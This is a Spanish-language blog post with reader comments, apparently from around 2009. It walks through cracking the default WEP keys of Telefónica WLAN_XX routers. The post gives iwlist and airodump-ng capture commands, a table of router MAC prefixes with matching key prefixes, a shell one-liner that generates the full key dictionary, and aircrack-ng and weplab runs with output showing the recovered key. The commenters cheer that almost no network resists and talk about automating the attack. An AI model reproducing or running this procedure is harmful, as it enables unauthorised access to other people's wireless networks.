Gracias a la información proporcionada por Abel, acabo probar un ataque muy sencillo para las redes wifi. El ataque se basa en las claves por defecto de las redes wifi de Telefónica del tipo WLAN_XX, sobre algunas capturas que se realicen.
Primero seleccionamos el punto de acceso al que le vamos a realizar el ataque, que tiene que ser del tipo WLAN_XX:
# iwlist ath0 scan
ath0 Scan completed :
...
Cell 05 - Address: 00:13:49:AB:12:CD
ESSID:"WLAN_21"
Mode:Master
Frequency:2.412 GHz (Channel 1)
Quality=27/70 Signal level=-68 dBm Noise level=-95 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 22 Mb/s
6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Extra:bcn_int=100
...
y además la MAC debería figurar en la tabla de más adelante.
Para obtener las capturas utilizamos:
airodump-ng --bssid 00:13:49:AB:12:CD -w captura ath0
y esperamos a que capture algunos paquetes, hará falta que haya algún cliente conectado. Con esto ya lo tenemos lo que encesitamos.
Las claves por defecto están formadas por un prefijo, en función de la MAC del punto de acceso:
| Prefijo MAC | Prefijo clave | Modelo |
| 00:60:B3 | Z001349 | Z-com |
| 00:A0:C5 | Z001349 | Zyxel 650HW/660HW |
| 00:13:49 | Z001349 | P-660HW-D1 |
| 00:01:38 | X000138 | Xavi 7768r |
| 00:03:C9 | C0030DA | Comtrend 535 |
| 00:16:38 | C0030DA | Comtrend 536+ |
| 00:19:15 | C0030DA | Comtrend 536+ |
| 00:30:DA | C0030DA | Comtrend 536+ |
| 00:1A:2B | C001D20 | Comtrend 536+ |
| 00:1D:20 | C001D20 | Comtrend 536+ |
| 00:02:CF | Z0002CF | ZyGate |
| 00:19:CB | Z0002CF | ZyGate |
y un sufijo que son los dos últimos caracteres del ESSID. Por último quedan 4 dígitos hexadecimales que se deconocen, por lo que habrá que generar todas las posibles combinaciones, que son solo 65536.
Para una MAC=00:13:49:AB:12:CD con nombre WLAN_21 sería Z001349????21, y el diccionario lo crearíamos con:
PRE=Z001349; WLAN=21; seq 0 $((2**16-1)) | xargs printf "$PRE%04X$WLAN\n" > diccionario.txt
Y ya se puede pasar a realizar el ataque con:
aircrack-ng -w diccionario.txt captura-01.cap
que tarda nada y menos en dar la clave: Z0013495ADB821.
Si no hay suerte seguramente es porque la clave la han cambiado, aunque eso sería muy extraño.
ACTUALIZACIÓN: La versión 1.0beta (puede que otras también) parece que da problemas a la hora de ataques de diccionario, e ignora esa opción pasando directamente a hacer el ataque típico. Se ve porque además de tardar tiempo se pone a probar claves:
Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1202 ivs.
Aircrack-ng 1.0 beta1
[00:00:03] Tested 467424 keys (got 1202 IVs)
KB depth byte(vote)
0 0/ 1 31(3072) 61(2816) 93(2816) 07(2560) 3E(2560)
1 0/ 1 F2(3072) 08(2816) 46(2816) 6C(2816) 10(2560)
2 1/ 2 CC(3072) 18(2816) 0A(2560) 16(2560) 2C(2560)
3 0/ 4 43(2560) 98(2560) DA(2560) FA(2560) 17(2304)
4 0/ 1 13(3072) 3D(2560) 52(2560) 99(2560) AF(2560)
5 0/ 1 FA(2560) 10(2304) 19(2304) 3A(2304) 4B(2304)
6 0/ 1 58(3072) DF(2816) 69(2560) 6C(2560) F9(2560)
7 0/ 1 2B(3584) 19(2816) 59(2816) 75(2816) 1F(2560)
8 0/ 1 12(3072) 91(2816) 18(2560) 67(2560) 92(2304)
9 0/ 1 91(3328) C1(3072) D0(3072) DF(2816) FB(2816)
10 0/ 1 00(2560) 02(2560) 12(2560) 6C(2560) 09(2304)
11 0/ 1 43(2560) B5(2560) C9(2560) D6(2560) 02(2304)
12 0/ 1 EE(2744) D0(2456) 36(2268) 4B(2268) 80(2232)
en vez de hacer el ataque de diccionario:
Opening captura-01.cap
Read 38146 packets.
Aircrack-ng 0.6.2
[00:00:00] Tested 45195 keys (got 1202 IVs)
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
2 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
3 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
4 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
5 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
6 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
7 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
8 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
9 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
10 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
11 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
12 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
KEY FOUND! [ 5A:30:30:31:33:34:39:35:41:44:42:38:32:31 ] (ASCII: Z0013495ADB821 )
Así que hay que tener cuidado con esto!
ACTUALIZACIÓN 20090223: No estoy seguro, pero parece que la versión rc1 de aircrack no hace el ataque de diccionario wep, por lo que se puede usar otro paquete:
$ sudo aptitude install weplab
y para hacer el ataque:
$ cat diccionario.txt | weplab -y -d 1 --key 128 --bssid 00:13:49:AB:12:CD captura-01.cap
...
Right KEY found!!
Passphrase was --> Z0013495ADB821
Key: 5A:30:30:31:33:34:39:35:41:44:42:38:32:31
This was the end of the dictionnary attack.
Referencias
Creo que además de funcionar con las de telefónica funciona con las de otros operadores, por ejemplo Jazztel. :-)
ResponderEliminarhoyga! hasta ayer no lo puse en practica va muy bien. En el airodump muchas veces salen mal los nombres de los APs, pero con windows se ven bien ¿sabes como arreglarlo?
ResponderEliminarNo se a que te refieres, con el airodump a veces salen algunos como lenght:0.
ResponderEliminarUna de las idéas que tenía para la pantallita era automatizar este ataque y que salieran las claves por la pantalla, pero me la he dejado olvidada en mi casa...
lo del lenght:0 tambien me sale, pero lo raro es que pillo un wifis que se llama wlan_1a desde windows, y en linux sale como wlan64323 (o algo asin) o_O ¿misterios de la computacion?
ResponderEliminarMuy buena aportacion men!! no se resiste casi ninguna xDD
ResponderEliminar